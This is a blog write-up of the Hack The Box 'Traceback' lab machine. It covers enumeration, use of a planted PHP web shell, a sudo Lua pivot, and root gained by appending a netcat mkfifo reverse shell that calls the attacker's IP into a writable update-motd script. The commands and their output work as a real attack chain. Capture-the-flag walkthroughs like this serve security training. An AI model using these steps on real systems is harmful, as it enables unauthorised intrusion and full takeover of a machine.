Posts Traceback Writeup [HTB]
Post
Cancel

Traceback Writeup [HTB]

Traceback is a linux machine rated as easy from Hack The Box, it consists on enumerating a hidden php web shell to obtain a reverse shell and then obtaining root by executing code abusing message of the day

Enumeration

Running nmap :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
  nmap -sC -sV 10.10.10.181
  Nmap scan report for 10.10.10.181
  Host is up (0.14s latency).
  Not shown: 998 closed ports
  PORT   STATE SERVICE VERSION
  22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey:
  |   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
  |   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
  |_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
  80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
  |_http-server-header: Apache/2.4.29 (Ubuntu)
  |_http-title: Help us
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Browsing to port 80 we find the following page : Web Inspecting source code we get a hint about web shells :

1
2
3
4
5
6
7
8
9
<body>
	<center>
		<h1>This site has been owned</h1>
		<h2>I have left a backdoor for all the net. FREE INTERNETZZZ</h2>
		<h3> - Xh4H - </h3>
		<!--Some of the best web shells that you might need ;)-->
	</center>
</body>
</html>

By searching that comment in google we find a github repository containing a few web shells https://github.com/TheBinitGhimire/Web-Shells We perform the following bash one liner in order to see which webshell is present :

1
2
3
4
5
6
7
8
9
10
for file in `ls Web-Shells`; do echo $file && curl -I http://10.10.10.181/$file; done
smevk.php
HTTP/1.1 200 OK
Date: Thu, 13 Aug 2020 09:22:12 GMT
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: PHPSESSID=akdt156m66vpen857lj14mnha9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8

Exploitation

Accessing the webshell asks for credentials, but inside the source code there were some hardcoded crendetials, admin:admin which allowed access Shell

Through network we can send a reverse shell using perl and we obtain a reverse connection as webadmin

1
2
3
4
5
6
nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.48] from (UNKNOWN) [10.10.10.181] 40304
Linux traceback 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
$ whoami
webadmin

Upgrade the shell to an interactive shell :

1
python3 -c 'import pty; pty.spawn("/bin/bash")'

Inside webadmin directory there is a .txt archive :

1
2
3
4
- sysadmin -
I have left a tool to practice Lua.
I am sure you know where to find it.
Contact me if you have any question.

Running sudo -l leaves the following output :

1
2
User webadmin may run the following commands on traceback:
(sysadmin) NOPASSWD: /home/sysadmin/luvit

Therefore using luvit we can execute lua commands and pivot to sysadmin :

1
2
3
4
webadmin@traceback:/home/webadmin$ sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("/bin/bash")'
<n /home/sysadmin/luvit -e 'os.execute("/bin/bash")'
sysadmin@traceback:/home/webadmin$ whoami
whoami

Privilege escalation

As user sysadmin we can go into .ssh dir and copy our id_rsa.pub into authorized keys, then we can login to ssh :

1
2
3
4
5
6
7
8
9
ssh sysadmin@10.10.10.181 -i id_rsa
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Aug 13 02:58:53 2020 from 10.10.14.43

We are greeted with a banner which is called message of the day , we can find this file inside /etc/update-motd.d , accessing that dir we see that we have writing permissions for those files. Therefore, we can append commands to 00-header that will be executed once a user logs in.

1
2
3
4
5
6
7
8
9
sysadmin@traceback:/etc/update-motd.d$ ls -la
total 32
drwxr-xr-x  2 root sysadmin 4096 Aug 27  2019 .
drwxr-xr-x 80 root root     4096 Mar 16 03:55 ..
-rwxrwxr-x  1 root sysadmin  981 Aug 13 03:22 00-header
-rwxrwxr-x  1 root sysadmin  982 Aug 13 03:22 10-help-text
-rwxrwxr-x  1 root sysadmin 4264 Aug 13 03:22 50-motd-news
-rwxrwxr-x  1 root sysadmin  604 Aug 13 03:22 80-esm
-rwxrwxr-x  1 root sysadmin  299 Aug 13 03:22 91-release-upgrade

We will insert a netcat reverse shell :

1
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.48 8888 >/tmp/f" >> 00-header

Checking netcat we obtain a reverse connection as root :

1
2
3
4
5
6
nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.10.14.48] from (UNKNOWN) [10.10.10.181] 33462
/bin/sh: 0: cant access tty; job control turned off
# whoami
root
This post is licensed under CC BY 4.0 by the author.